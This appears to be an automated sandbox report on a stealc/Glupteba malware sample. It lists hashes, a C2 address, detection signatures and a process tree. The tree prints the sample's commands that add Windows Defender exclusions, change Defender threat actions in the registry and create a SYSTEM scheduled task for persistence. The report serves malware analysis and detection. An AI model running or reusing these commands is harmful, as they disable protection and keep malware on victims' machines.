Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    4s
  • max time network
    43s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/05/2024, 01:38

Errors

Reason
Machine shutdown

General

  • Target

    8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913.exe

  • Size

    389KB

  • MD5

    d6078bbecc15a333c6171debc4488498

  • SHA1

    ca57a639ec0fc1a6489b69278478c5845a4c046b

  • SHA256

    8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913

  • SHA512

    912f67baa141bb846a12568c94d5dfbd6d6cdefe0a036a9249accd83e9ee460bc8863758c8bd5cdac7a0af3f481194b57ef414378ebb400967579ba6d736469e

  • SSDEEP

    6144:vLFJaFBq+TaKqqrlBLSIOHGt8i3/gmjX/RBdRP2gjycIeVMO+ZyeR:vOlldCGt//gmjXjdR+KjFVMPZN

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Detect binaries embedding considerable number of MFA browser extension IDs. 3 IoCs
  • Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 3 IoCs
  • Detects Windows executables referencing non-Windows User-Agents 6 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs
  • Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs
  • Detects executables Discord URL observed in first stage droppers 6 IoCs
  • Detects executables built or packed with MPress PE compressor 3 IoCs
  • Detects executables containing URLs to raw contents of a Github gist 6 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 6 IoCs
  • Detects executables packed with or use KoiVM 1 IoCs
  • Detects executables referencing many varying, potentially fake Windows User-Agents 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Windows security modification 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913.exe
    "C:\Users\Admin\AppData\Local\Temp\8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:5020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913.exe" -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4876
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:216
      • C:\Users\Admin\Pictures\4gI7L81mG1osxawOScTUtwHG.exe
        "C:\Users\Admin\Pictures\4gI7L81mG1osxawOScTUtwHG.exe"
        3⤵
          PID:4844
          • C:\Users\Admin\AppData\Local\Temp\u3qk.0.exe
            "C:\Users\Admin\AppData\Local\Temp\u3qk.0.exe"
            4⤵
              PID:5112
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 2284
                5⤵
                • Program crash
                PID:2184
            • C:\Users\Admin\AppData\Local\Temp\u3qk.1.exe
              "C:\Users\Admin\AppData\Local\Temp\u3qk.1.exe"
              4⤵
                PID:3612
                • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                  "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                  5⤵
                    PID:6032
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 1152
                  4⤵
                  • Program crash
                  PID:380
              • C:\Users\Admin\Pictures\V5LDhmREVp6GTZGDqo8K4TjG.exe
                "C:\Users\Admin\Pictures\V5LDhmREVp6GTZGDqo8K4TjG.exe"
                3⤵
                  PID:2288
                • C:\Users\Admin\Pictures\EMZe1b9QW5eAo1C2VDDrZqoF.exe
                  "C:\Users\Admin\Pictures\EMZe1b9QW5eAo1C2VDDrZqoF.exe"
                  3⤵
                    PID:4104
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:3540
                    • C:\Users\Admin\Pictures\EMZe1b9QW5eAo1C2VDDrZqoF.exe
                      "C:\Users\Admin\Pictures\EMZe1b9QW5eAo1C2VDDrZqoF.exe"
                      4⤵
                        PID:5556
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1416
                    • C:\Users\Admin\Pictures\3IlhJc3lYYLwkAxx9hoG74ys.exe
                      "C:\Users\Admin\Pictures\3IlhJc3lYYLwkAxx9hoG74ys.exe"
                      3⤵
                        PID:3928
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4736
                        • C:\Users\Admin\Pictures\3IlhJc3lYYLwkAxx9hoG74ys.exe
                          "C:\Users\Admin\Pictures\3IlhJc3lYYLwkAxx9hoG74ys.exe"
                          4⤵
                            PID:5564
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              PID:4460
                        • C:\Users\Admin\Pictures\UipECGgq5107Tlap3XLEhfLo.exe
                          "C:\Users\Admin\Pictures\UipECGgq5107Tlap3XLEhfLo.exe"
                          3⤵
                            PID:3876
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              PID:2736
                            • C:\Users\Admin\Pictures\UipECGgq5107Tlap3XLEhfLo.exe
                              "C:\Users\Admin\Pictures\UipECGgq5107Tlap3XLEhfLo.exe"
                              4⤵
                                PID:5684
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:2736
                            • C:\Users\Admin\Pictures\a8rjrHsN3gcX0w2P4PPp0nZb.exe
                              "C:\Users\Admin\Pictures\a8rjrHsN3gcX0w2P4PPp0nZb.exe"
                              3⤵
                                PID:4636
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:3700
                                • C:\Users\Admin\Pictures\a8rjrHsN3gcX0w2P4PPp0nZb.exe
                                  "C:\Users\Admin\Pictures\a8rjrHsN3gcX0w2P4PPp0nZb.exe"
                                  4⤵
                                    PID:5492
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:4864
                                • C:\Users\Admin\Pictures\H9XFNI84PKEMa6vxnBjx0BWn.exe
                                  "C:\Users\Admin\Pictures\H9XFNI84PKEMa6vxnBjx0BWn.exe"
                                  3⤵
                                    PID:1532
                                    • C:\Users\Admin\AppData\Local\Temp\7zS7501.tmp\Install.exe
                                      .\Install.exe /tEdidDDf "385118" /S
                                      4⤵
                                        PID:640
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          5⤵
                                            PID:2040
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              6⤵
                                                PID:5380
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  7⤵
                                                    PID:5404
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      8⤵
                                                        PID:5700
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    6⤵
                                                      PID:5788
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        7⤵
                                                          PID:5812
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            8⤵
                                                              PID:6028
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          6⤵
                                                            PID:5284
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              7⤵
                                                                PID:5236
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  8⤵
                                                                    PID:5252
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                6⤵
                                                                  PID:5512
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    7⤵
                                                                      PID:1112
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        8⤵
                                                                          PID:5880
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      6⤵
                                                                        PID:6068
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          7⤵
                                                                            PID:6108
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:6132
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                9⤵
                                                                                  PID:736
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                          5⤵
                                                                            PID:2836
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                              6⤵
                                                                                PID:5704
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                  7⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:5712
                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    8⤵
                                                                                      PID:5348
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7501.tmp\Install.exe\" it /gRYdidTRbt 385118 /S" /V1 /F
                                                                                5⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:1872
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                5⤵
                                                                                  PID:1792
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                    6⤵
                                                                                      PID:960
                                                                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                        7⤵
                                                                                          PID:4772
                                                                                • C:\Users\Admin\Pictures\cJg4MoDUZoAD8KEEmF7LeiQo.exe
                                                                                  "C:\Users\Admin\Pictures\cJg4MoDUZoAD8KEEmF7LeiQo.exe"
                                                                                  3⤵
                                                                                    PID:5476
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS7E58.tmp\Install.exe
                                                                                      .\Install.exe /tEdidDDf "385118" /S
                                                                                      4⤵
                                                                                        PID:5596
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                          5⤵
                                                                                            PID:5728
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                              6⤵
                                                                                                PID:5832
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                  7⤵
                                                                                                    PID:5888
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                      8⤵
                                                                                                        PID:5212
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                    6⤵
                                                                                                      PID:5460
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                        7⤵
                                                                                                          PID:4428
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                            8⤵
                                                                                                              PID:5604
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                          6⤵
                                                                                                            PID:5980
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                              7⤵
                                                                                                                PID:5960
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                  8⤵
                                                                                                                    PID:6016
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                6⤵
                                                                                                                  PID:6060
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                    7⤵
                                                                                                                      PID:6004
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                        8⤵
                                                                                                                          PID:6092
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                      6⤵
                                                                                                                        PID:5804
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                          7⤵
                                                                                                                            PID:6000
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                              8⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5432
                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                9⤵
                                                                                                                                  PID:1596
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                          5⤵
                                                                                                                            PID:5952
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                              6⤵
                                                                                                                                PID:4220
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                  7⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:3860
                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                    8⤵
                                                                                                                                      PID:5152
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7E58.tmp\Install.exe\" it /GahdidtwBo 385118 /S" /V1 /F
                                                                                                                                5⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:2080
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                5⤵
                                                                                                                                  PID:5420
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                    6⤵
                                                                                                                                      PID:5900
                                                                                                                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                        7⤵
                                                                                                                                          PID:3868
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:3844
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:2192
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:3500
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4844 -ip 4844
                                                                                                                                    1⤵
                                                                                                                                      PID:4448
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS7501.tmp\Install.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS7501.tmp\Install.exe it /gRYdidTRbt 385118 /S
                                                                                                                                      1⤵
                                                                                                                                        PID:5264
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                          2⤵
                                                                                                                                            PID:1336
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                              3⤵
                                                                                                                                                PID:5888
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5544
                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4440
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3972
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5864
                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5928
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5932
